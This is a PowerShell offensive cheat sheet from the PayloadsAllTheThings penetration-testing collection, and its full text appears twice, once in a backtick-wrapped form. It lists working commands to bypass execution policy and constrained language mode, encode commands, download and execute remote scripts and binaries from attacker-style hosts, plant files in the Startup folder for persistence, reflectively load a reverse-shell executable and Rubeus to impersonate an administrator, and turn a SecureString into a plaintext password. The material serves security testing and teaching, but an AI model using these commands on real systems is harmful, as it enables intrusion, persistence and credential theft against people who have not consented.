PayloadsAllTheThings/Methodology and Resources/Powershell - Cheatsheet.md

# Powershell

## Summary

* Execution Policy
* Encoded Commands
* Download file
* Load Powershell scripts
* Load C# assembly reflectively
* Secure String to Plaintext
* References

## Execution Policy

```ps1
powershell -EncodedCommand $encodedCommand
powershell -ep bypass ./PowerView.ps1

# Change execution policy
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
Set-ExecutionPolicy Bypass -Scope Process
```

## Constrained Mode

```ps1
# Check if we are in a constrained mode
# Values could be: FullLanguage or ConstrainedLanguage
$ExecutionContext.SessionState.LanguageMode

## Bypass
powershell -version 2
```

## Encoded Commands

* Windows
    ```ps1
    $command = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")'
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
    $encodedCommand = [Convert]::ToBase64String($bytes)
    ```
* Linux: :warning: UTF-16LE encoding is required
    ```ps1
    echo 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")' | iconv -t utf-16le | base64 -w 0
    ```

## Download file

```ps1
# Any version
(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerView.ps1", "C:\Windows\Temp\PowerView.ps1")
wget "http://10.10.10.10/taskkill.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
Import-Module BitsTransfer; Start-BitsTransfer -Source $url -Destination $output

# Powershell 4+
IWR "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe"
Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe"
```

## Load Powershell scripts

```ps1
# Proxy-aware
IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1')
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1') | powershell -noprofile -
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.10.10/PowerView.ps1')|iex"

# Non-proxy aware
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://10.10.10.10/PowerView.ps1',$false);$h.send();iex $h.responseText
```

## Load C# assembly reflectively

```powershell
# Download and run assembly without arguments
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/rev.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[rev.Program]::Main()

# Download and run Rubeus, with arguments (make sure to split the args)
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())

# Execute a specific method from an assembly (e.g. a DLL)
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/lib.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)
```

## Secure String to Plaintext

```ps1
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl
UserName       : Tom
Password       : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain         : HTB
```

## References

* [Windows & Active Directory Exploitation Cheat Sheet and Command Reference - @chvancooten](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/)
* [Basic PowerShell for Pentesters - HackTricks](https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters)
Powershell Cheatsheet 2021-11-06 18:14:47 +00:00			`# Powershell`

			`## Summary`

			`* Execution Policy`
			`* Encoded Commands`
			`* Download file`
			`* Load Powershell scripts`
			`* Load C# assembly reflectively`
			`* Secure String to Plaintext`
			`* References`

			`## Execution Policy`

			```ps1
			`powershell -EncodedCommand $encodedCommand`
			`powershell -ep bypass ./PowerView.ps1`

			`# Change execution policy`
			`Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted`
			`Set-ExecutionPolicy Bypass -Scope Process`
			```

			`## Constrained Mode`

			```ps1
			`# Check if we are in a constrained mode`
			`# Values could be: FullLanguage or ConstrainedLanguage`
			`$ExecutionContext.SessionState.LanguageMode`

			`## Bypass`
			`powershell -version 2`
			```

			`## Encoded Commands`

			`* Windows`
			```ps1
			`$command = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")'`
			`$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)`
			`$encodedCommand = [Convert]::ToBase64String($bytes)`
			```
			`* Linux: :warning: UTF-16LE encoding is required`
			```ps1
			`echo 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")' \| iconv -t utf-16le \| base64 -w 0`
			```

			`## Download file`

			```ps1
			`# Any version`
			`(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerView.ps1", "C:\Windows\Temp\PowerView.ps1")`
			`wget "http://10.10.10.10/taskkill.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"`
			`Import-Module BitsTransfer; Start-BitsTransfer -Source $url -Destination $output`

			`# Powershell 4+`
			`IWR "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe"`
			`Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe"`
			```

			`## Load Powershell scripts`

			```ps1
			`# Proxy-aware`
			`IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1')`
			`echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1') \| powershell -noprofile -`
			`powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.10.10/PowerView.ps1')\|iex"`

			`# Non-proxy aware`
			`$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://10.10.10.10/PowerView.ps1',$false);$h.send();iex $h.responseText`
			```

			`## Load C# assembly reflectively`

			```powershell
			`# Download and run assembly without arguments`
			`$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/rev.exe')`
			`$assem = [System.Reflection.Assembly]::Load($data)`
			`[rev.Program]::Main()`

			`# Download and run Rubeus, with arguments (make sure to split the args)`
			`$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/Rubeus.exe')`
			`$assem = [System.Reflection.Assembly]::Load($data)`
			`[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())`

			`# Execute a specific method from an assembly (e.g. a DLL)`
			`$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/lib.dll')`
			`$assem = [System.Reflection.Assembly]::Load($data)`
			`$class = $assem.GetType("ClassLibrary1.Class1")`
			`$method = $class.GetMethod("runner")`
			`$method.Invoke(0, $null)`
			```

			`## Secure String to Plaintext`

			```ps1
			`$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" \| convertto-securestring`
			`$user = "HTB\Tom"`
			`$cred = New-Object System.management.Automation.PSCredential($user, $pass)`
			`$cred.GetNetworkCredential() \| fl`
			`UserName : Tom`
			`Password : 1ts-mag1c!!!`
			`SecurePassword : System.Security.SecureString`
			`Domain : HTB`
			```

			`## References`

			`* [Windows & Active Directory Exploitation Cheat Sheet and Command Reference - @chvancooten](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/)`
			`* [Basic PowerShell for Pentesters - HackTricks](https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters)`